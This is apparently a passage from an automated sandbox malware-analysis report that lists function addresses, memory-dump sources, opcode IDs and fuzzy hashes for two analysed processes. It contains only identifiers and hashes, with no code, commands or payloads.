                Function 00007FFAAC4605D8 Relevance: .0, Instructions: 50COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 815960f1ff591d5c4e2af85a49a42ef315f549e760582e0de138658879292c40
                • Instruction ID: bd75cbb62886dd6c2a3d3a464f1e463dbfd90c2964d9a2eb13c8f8145c0b410a
                • Opcode Fuzzy Hash: 815960f1ff591d5c4e2af85a49a42ef315f549e760582e0de138658879292c40
                • Instruction Fuzzy Hash: A6018C30909A0E8FEF88EF24C449ABAB7A1EF59309F10857AD40EC2199CE31B554CB80
                Function 00007FFAAC462ED1 Relevance: .0, Instructions: 50COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 96aa739c3e3c8ce099990ee15b6ff30145491507788b99ee93fb445372cb5b2b
                • Instruction ID: 30da51d28d8e646af8ee21824d87a16f48e1d047556a1f267fbb5fdc36118591
                • Opcode Fuzzy Hash: 96aa739c3e3c8ce099990ee15b6ff30145491507788b99ee93fb445372cb5b2b
                • Instruction Fuzzy Hash: 1A01843091E6499FF755EB74C44D6A9BBE0EF1A304F4589B6D40CC70A6EB38E1488740
                Function 00007FFAAC46AD98 Relevance: .0, Instructions: 47COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 04da41a06a8f3a74f56c0b849b06213edb599c862691fc0ba2e3bb98405d0100
                • Instruction ID: b4216e9f1ee71ab6c889845ac190cac1d1718a997a83fdd43fc2177dc777b6a4
                • Opcode Fuzzy Hash: 04da41a06a8f3a74f56c0b849b06213edb599c862691fc0ba2e3bb98405d0100
                • Instruction Fuzzy Hash: 84014830919A0ECFEB84EBA8C4486BAB6B0FF19309F10897AE41ED2195DE34A1548784
                Function 00007FFAAC46C7A8 Relevance: .0, Instructions: 47COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 83c34058d5f733ee9167e10c7c6a1bf147e1148c444fc55cdc3d04272c39e3bb
                • Instruction ID: d4095afb338c126ff2c571dc7ec2c4359bb645b2e234332841034f8397bc2732
                • Opcode Fuzzy Hash: 83c34058d5f733ee9167e10c7c6a1bf147e1148c444fc55cdc3d04272c39e3bb
                • Instruction Fuzzy Hash: AD014C30914A0E9FEB44EB64C4486BDB7A0FF19309F10487AE41ED6195DA35A554C780
                Function 00007FFAAC4628AD Relevance: .0, Instructions: 47COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a75d21b9917d1f71617e14eec92010d55b10b72e65fe79825036a46d6a31ab69
                • Instruction ID: 3aaaf0bce46efe7f8ce292166c7f8d9db7a25b3a051b1a88214e629eecd880b8
                • Opcode Fuzzy Hash: a75d21b9917d1f71617e14eec92010d55b10b72e65fe79825036a46d6a31ab69
                • Instruction Fuzzy Hash: 8901B57090964D9FF751EB24884D5B9BBE0FF56305F0185B6D40CC61A6DA38E548C740
                Function 00007FFAAC46A859 Relevance: .0, Instructions: 47COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5fb13ca8817dfb640fe9ad8b73f86dd45615e75d564e511c1104c7a7fdfba976
                • Instruction ID: fb4d306458c388b6b2624b2adc5cb23af5af4d71ff3a29ca1add0c985e080337
                • Opcode Fuzzy Hash: 5fb13ca8817dfb640fe9ad8b73f86dd45615e75d564e511c1104c7a7fdfba976
                • Instruction Fuzzy Hash: 5201C03080AB898FEB5AEB24C4591B9BBA0EF16304F0184BAD00EC6196DA29A849C740
                Function 00007FFAAC46AD58 Relevance: .0, Instructions: 46COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 341803d6e5963468378d7f8329b5014b1ad4fbe70415433f99234c9bf5dbb51e
                • Instruction ID: cc386235a2fb7d2faad97cc625cae36d5ce0394c4373324f8139f18d0f68867c
                • Opcode Fuzzy Hash: 341803d6e5963468378d7f8329b5014b1ad4fbe70415433f99234c9bf5dbb51e
                • Instruction Fuzzy Hash: 0A018F3094994ECFEB48EF24C0496BEB7A1FF59309F50847EE80EC2199CE35A194C784
                Function 00007FFAAC46C360 Relevance: .0, Instructions: 46COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d687baac55daff7f71df4d41fb2454a912eb7bb9b03fe7b98d12f9f54d7cbb7f
                • Instruction ID: 3b2afd9bf588be6fc99e0d82716f32da3085ec9e524ec0a75337618356cd0c15
                • Opcode Fuzzy Hash: d687baac55daff7f71df4d41fb2454a912eb7bb9b03fe7b98d12f9f54d7cbb7f
                • Instruction Fuzzy Hash: D1011A7091994E8FEB84EF64C4596BAB6E0FF19305F50487AE41EC31A5DF31A594C740
                Function 00007FFAAC46A9B9 Relevance: .0, Instructions: 44COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9d73d82bb774db4e616150540015b6721d1dc18391b7ea4a536e288510421e98
                • Instruction ID: 4df7b25752c260265d8032f821eef06ce672270e9f5410ca81cc8eabbbe2c033
                • Opcode Fuzzy Hash: 9d73d82bb774db4e616150540015b6721d1dc18391b7ea4a536e288510421e98
                • Instruction Fuzzy Hash: 0901887084DB899FE751EB34844D5A9BBE0EF07318F1589F2D40DC70A7DA28E44C8745
                Function 00007FFAAC461CED Relevance: .0, Instructions: 43COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a19a978bde600afe118d1aca75b77263e4240b700a915775f0383a42ae754cc4
                • Instruction ID: 45d3644fa7ddddbf54de425f53dc61037f1d5a5b1abfd10a318453cf90e68574
                • Opcode Fuzzy Hash: a19a978bde600afe118d1aca75b77263e4240b700a915775f0383a42ae754cc4
                • Instruction Fuzzy Hash: 0501D63080A78DCFFB589F24C4192B97BA0EF56305F40457AD80DC6195CA35E494C780
                Function 00007FFAAC462F49 Relevance: .0, Instructions: 43COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 8d222c458c39d05dff7149974550807335b2a8a3d4c4b37644838345f1c5449d
                • Instruction ID: 0c729e15dced57502b4e83b5c6c214b890d14967b19d5e0e473aa3ccb43aacc8
                • Opcode Fuzzy Hash: 8d222c458c39d05dff7149974550807335b2a8a3d4c4b37644838345f1c5449d
                • Instruction Fuzzy Hash: 8A01D43094E6899FE766A734844D6A9FBE0EF16304F0589F2C40DC70AADA28E4488341
                Function 00007FFAAC48D4D0 Relevance: .0, Instructions: 42COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4766f2c26a24d44f240f3a514899e0c345e342a7a6f83d4f57663079268ff1da
                • Instruction ID: 7257ad8e7982c2584c9df7ac238d245a26e45b6450fc8fc170573ab753101939
                • Opcode Fuzzy Hash: 4766f2c26a24d44f240f3a514899e0c345e342a7a6f83d4f57663079268ff1da
                • Instruction Fuzzy Hash: F901FB7095991E8FEB40FB68C44D5BA77E4FF19309F008976D41DC70A5EA34E2948740
                Function 00007FFAAC460610 Relevance: .0, Instructions: 42COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 46619fd2f2688dbc725bc86dfe8bc3f9780753a671ea95731a562ed82a48c557
                • Instruction ID: 0f98da64214a2f82256c3bf8d9585393a5b59a00032489cabae1787d7025afad
                • Opcode Fuzzy Hash: 46619fd2f2688dbc725bc86dfe8bc3f9780753a671ea95731a562ed82a48c557
                • Instruction Fuzzy Hash: 02016D3085990EEBEB58EB24C4486B9B3A0FF19309F10897ED40EC22E9DE39E554C640
                Function 00007FFAAC460608 Relevance: .0, Instructions: 42COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 15eccdf6fe08307d982aa2f7109bc901f95636cd37bcbee2815e9f3752ae310c
                • Instruction ID: 789bcc4636301e4cfa8eb864c4020357cbd9e1131dff24573cfca7329c1fbcd3
                • Opcode Fuzzy Hash: 15eccdf6fe08307d982aa2f7109bc901f95636cd37bcbee2815e9f3752ae310c
                • Instruction Fuzzy Hash: CA01AD3080590EDBEB68EB24C84D6B9F2A0FF09309F10897ED40EC22D5DE35A044C690
                Function 00007FFAAC461240 Relevance: .0, Instructions: 41COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1d9e2994c1813f451a6374bc836a43eb2c6570ec98b3fd1f8d3a227f311a76a1
                • Instruction ID: 631714f59e3a63e7de22e1d14e47870a5d8d5b3fd6bd0e977dbea346bfb918ae
                • Opcode Fuzzy Hash: 1d9e2994c1813f451a6374bc836a43eb2c6570ec98b3fd1f8d3a227f311a76a1
                • Instruction Fuzzy Hash: AFF0D17091A60ECBFB989B68840C7BAB7B0FF56319F00853AD41DD20D5DA2451588680
                Function 00007FFAAC46C3C9 Relevance: .0, Instructions: 40COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: de91e1830fe519c04a14a45f9f077646e61fe5c8384c43c0a5b9dbfa82f02bf6
                • Instruction ID: a8efbd829da52c180e6321b781a5374384a2cb9db293c4a59d2ef15445726370
                • Opcode Fuzzy Hash: de91e1830fe519c04a14a45f9f077646e61fe5c8384c43c0a5b9dbfa82f02bf6
                • Instruction Fuzzy Hash: 6001D13084E78A8FEB4A9F2488591B97FA0FF16305F4141BBE80CC6196DA39D458C780
                Function 00007FFAAC4605D0 Relevance: .0, Instructions: 39COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a62708fc5f595d068357711010f2e1a060c61abdda4b1240acb147ebc1e6b2f9
                • Instruction ID: 939480208d9cf62ecda76d3791d3e229232548aa5b2ec25025b4fea4f7a3d82c
                • Opcode Fuzzy Hash: a62708fc5f595d068357711010f2e1a060c61abdda4b1240acb147ebc1e6b2f9
                • Instruction Fuzzy Hash: 42F04F3084A64ECFEF94AF24D4196BAB7A0EF16309F50857AE80DC2195CA35E554CB84
                Function 00007FFAAC4627C9 Relevance: .0, Instructions: 36COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7012105136f15ae455e217a421ca871f5cdd7aefec59c15ef84f0fc58fd010e5
                • Instruction ID: ddc84c15f54aa1a3f256125d80fefec35e8493c4b2380f0522ee9ece8da6b0b6
                • Opcode Fuzzy Hash: 7012105136f15ae455e217a421ca871f5cdd7aefec59c15ef84f0fc58fd010e5
                • Instruction Fuzzy Hash: 65F0C27080E7898FFB6A9B2088192B9BFA0BF46305F0549BBD40AC51D6DA289858C391
                Function 00007FFAAC46B0F8 Relevance: .0, Instructions: 35COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 88570fdd45eb2998c041c82b1ac7f42310ca0ffb992c9a055ffd18b91e2ab64d
                • Instruction ID: 5aea6f22cf2cc2e0121433df43a03ee15c08f2d853bad8e48b8fc1e98d942baf
                • Opcode Fuzzy Hash: 88570fdd45eb2998c041c82b1ac7f42310ca0ffb992c9a055ffd18b91e2ab64d
                • Instruction Fuzzy Hash: C4F08C7091AA19DFFBA1EB18C849BE9B3B0FF59304F1082A6D40ED3156CA34D9858F84
                Function 00007FFAAC46BFFA Relevance: .0, Instructions: 35COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 71a3bbf4f10532d0face3478e7c159a010d6c7ff033bb9bb78c50d9bd34423d5
                • Instruction ID: eb6aec1343c55141e286a05c5e1215074fd84fc68b168744d8ffc2790f704827
                • Opcode Fuzzy Hash: 71a3bbf4f10532d0face3478e7c159a010d6c7ff033bb9bb78c50d9bd34423d5
                • Instruction Fuzzy Hash: 41F01D70819A4ECFFB94AF6888592BABAA0FF15209F00497AE81DC2195DF7495588784
                Function 00007FFAAC46283D Relevance: .0, Instructions: 34COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0c640e386cdc3ea32aa5aa2732dabb1125a0471fe490d7b153773a1928f8ec9e
                • Instruction ID: 526905e37224a130f7251b424348efb651fe25d0216730e1691caf4e557eab4f
                • Opcode Fuzzy Hash: 0c640e386cdc3ea32aa5aa2732dabb1125a0471fe490d7b153773a1928f8ec9e
                • Instruction Fuzzy Hash: C8F0F67080974ACFE7685B2488192B9BBA0FF56205F404579D80DC11D5DB38D4548240
                Function 00007FFAAC46BD74 Relevance: .0, Instructions: 19COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 26fa9e5a597544388d00e9377674cf0477d345e141920ad6363c26b3fb63ac16
                • Instruction ID: edc8f396ddead48e030693d5414cb93c55923655aca68bc402e56dfe2cfc50a8
                • Opcode Fuzzy Hash: 26fa9e5a597544388d00e9377674cf0477d345e141920ad6363c26b3fb63ac16
                • Instruction Fuzzy Hash: 58D0E831A0894DCFAF80EB88E884AECBBB0EF59301F000022E00CE2284CA20A4948B84
                Function 00007FFAAC4677C3 Relevance: .0, Instructions: 17COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2baf3565abb4795e24eb94b509b97df3b0246777df8d85d9df17d8d83c5e501d
                • Instruction ID: 82018c31e3bbdffe1891434b69b74b90445107ddbcdc5a7cbd954639fd940c09
                • Opcode Fuzzy Hash: 2baf3565abb4795e24eb94b509b97df3b0246777df8d85d9df17d8d83c5e501d
                • Instruction Fuzzy Hash: 51E0EC70D0A91FCFEFA8DF0484547F8E2B5EB19305F1040B9810EE3284CE346AC18B48
                Function 00007FFAAC460FC9 Relevance: .0, Instructions: 14COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000005.00000002.1490480432.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_5_2_7ffaac460000_portruntime.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6dd470b0f509167519365d6964e41e63f26a18fc2cb542703b8bea6f516291c7
                • Instruction ID: f7c3f24f74241c0f63b9dfd84f32356654a1d73ee40666cdcf515492f2cb4820
                • Opcode Fuzzy Hash: 6dd470b0f509167519365d6964e41e63f26a18fc2cb542703b8bea6f516291c7
                • Instruction Fuzzy Hash: C5E0EC60D1951D8BFB94EB28CC48FADBA71AF54308F10C1B6D10EE3195DE3469858F88

                Executed Functions

                Function 00007FFAAC47E7CE Relevance: 5.2, Strings: 4, Instructions: 201COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000014.00000002.1590782742.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_20_2_7ffaac470000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID: 4$:$Y$j
                • API String ID: 0-2791243150
                • Opcode ID: c877aaf37b2de09f431f365e918ceef0d6df70a41e47ce8472f777c951045ca3
                • Instruction ID: 50f3c2b92f981fa87288bff4b8b7791b849235520666947c0e819e0739920a77
                • Opcode Fuzzy Hash: c877aaf37b2de09f431f365e918ceef0d6df70a41e47ce8472f777c951045ca3
                • Instruction Fuzzy Hash: 4E9118B0D0962D8FEBA8DF14C8987A9B7B1EB45305F1081EAD10DA3291DE346AC5CF85
                Function 00007FFAAC47C6BD Relevance: 1.5, Strings: 1, Instructions: 219COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000014.00000002.1590782742.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_20_2_7ffaac470000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID: %;}
                • API String ID: 0-3602297886
                • Opcode ID: b09e0ea9401faf594d02b8734712360bde6adf9ff7aa034a898a937b44875ced
                • Instruction ID: 572147bd3450c262ef4f55a6dc0a488bf6752359405534dc190937a7ce4569b0
                • Opcode Fuzzy Hash: b09e0ea9401faf594d02b8734712360bde6adf9ff7aa034a898a937b44875ced
                • Instruction Fuzzy Hash: 5751A0639CD52A8AE7417BBCF4198FD3790DF42339B048277D14DC9297DE2870898AD9
                Function 00007FFAAC47C069 Relevance: 1.5, Strings: 1, Instructions: 210COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000014.00000002.1590782742.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_20_2_7ffaac470000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID: 89
                • API String ID: 0-211841788
                • Opcode ID: 68e51ca24c09b5fdf4fb12bdba94e4b08cd66259d82d0c5686da9c52d1612112
                • Instruction ID: e8c25a7f59ac07f49cd145f271d3beb357d58463821aa68724404d761fee4fa7
                • Opcode Fuzzy Hash: 68e51ca24c09b5fdf4fb12bdba94e4b08cd66259d82d0c5686da9c52d1612112
                • Instruction Fuzzy Hash: C4611970D0D66DCFEB94EB98C8596BD77B1EF5A304F50417AD00DE3292DE38A9488B84
                Function 00007FFAAC47C7D3 Relevance: 1.4, Strings: 1, Instructions: 151COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000014.00000002.1590782742.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_20_2_7ffaac470000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID: ^
                • API String ID: 0-1590793086
                • Opcode ID: f97bff58debadd8119bd01635b224554df6ed1ec2e95a1c685b735ea743653a8
                • Instruction ID: 7a9e9eecbfaeeedf15c9279b8457afb025cbdc35e0b7383a561bf86fd90fd3ee
                • Opcode Fuzzy Hash: f97bff58debadd8119bd01635b224554df6ed1ec2e95a1c685b735ea743653a8
                • Instruction Fuzzy Hash: EE41F5269CE12A8BF7417BA8F8598F97790EF4273AF05813BD00DC5293DE24A09946D8
                Function 00007FFAAC47D869 Relevance: .4, Instructions: 389COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000014.00000002.1590782742.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_20_2_7ffaac470000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 301ecd4c87b040f5d695f4c1bd4225bfce9f6bd1c2ded192d2270970f00b7f20
                • Instruction ID: 21a3e0830fbd86c6574c445806f33b59ef439d4d8680a50b8e94ab0ad6f2b4a6
                • Opcode Fuzzy Hash: 301ecd4c87b040f5d695f4c1bd4225bfce9f6bd1c2ded192d2270970f00b7f20
                • Instruction Fuzzy Hash: 03E18F70D29A59CFEB98DB68C459BB8B7B1FF59304F0441BAD00ED7296CA34A844CF85
                Function 00007FFAAC470525 Relevance: .4, Instructions: 387COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000014.00000002.1590782742.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_20_2_7ffaac470000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: acb8765df887d7ec4e77de8e942a44f9f56e084d2b5a43f13941df66839a6369
                • Instruction ID: a77426b2c24314e27d88e47d3bfc44cc7746bb236918c2b676fd4b1090c36700
                • Opcode Fuzzy Hash: acb8765df887d7ec4e77de8e942a44f9f56e084d2b5a43f13941df66839a6369
                • Instruction Fuzzy Hash: 28B16C87A8F6E28BF21163BCB8295F67F90DF4222870C81B7D18DCA19BDC08E44947D5
                Function 00007FFAAC4705A0 Relevance: .3, Instructions: 322COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000014.00000002.1590782742.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_20_2_7ffaac470000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 45377d1dd48364ddfe721536462797fcc925761f9c7f251eabd06fcc593cc74e
                • Instruction ID: 485e6309a685291797ebba51b112515f5d40ce39f65630c974280adc5cb96623
                • Opcode Fuzzy Hash: 45377d1dd48364ddfe721536462797fcc925761f9c7f251eabd06fcc593cc74e
                • Instruction Fuzzy Hash: 01913B8698F7E28BF25163BCA82D5F66FD0DF4222870C81B7D18DCA19BDC08E44947D6
                Function 00007FFAAC470638 Relevance: .3, Instructions: 293COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000014.00000002.1590782742.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_20_2_7ffaac470000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 18fe9756e30b13bdda3274fc576a2c51e02a13c4a138de9916ff816d77c3867c
                • Instruction ID: b2e45fc7a3d2c5f97fac89c847538cff6bd03d80e46462414d0040a2d87a8765
                • Opcode Fuzzy Hash: 18fe9756e30b13bdda3274fc576a2c51e02a13c4a138de9916ff816d77c3867c
                • Instruction Fuzzy Hash: 0981598694F6D18BF31163BCA81D5FA6FD0EF4232870881B7D08DC619BDC18E4498BD6
                Function 00007FFAAC471738 Relevance: .3, Instructions: 292COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000014.00000002.1590782742.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_20_2_7ffaac470000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3fff9efc64b97fd2dadd8dc494f29b12b91944202e0b477e8ce7021ed6fccd23
                • Instruction ID: 2485476ca511cda68cbb4e45a5cf8b89c401b811df0ee58633ad6a4ca14e89a1
                • Opcode Fuzzy Hash: 3fff9efc64b97fd2dadd8dc494f29b12b91944202e0b477e8ce7021ed6fccd23
                • Instruction Fuzzy Hash: 8091B031A1CA598FEB58DB1CC8596B977E2FF99314B14417AE44EC3282DE34E80687C5
                Function 00007FFAAC470640 Relevance: .3, Instructions: 271COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000014.00000002.1590782742.00007FFAAC470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC470000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_20_2_7ffaac470000_HuzhgkcqwYiFfxvhdfMUs.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
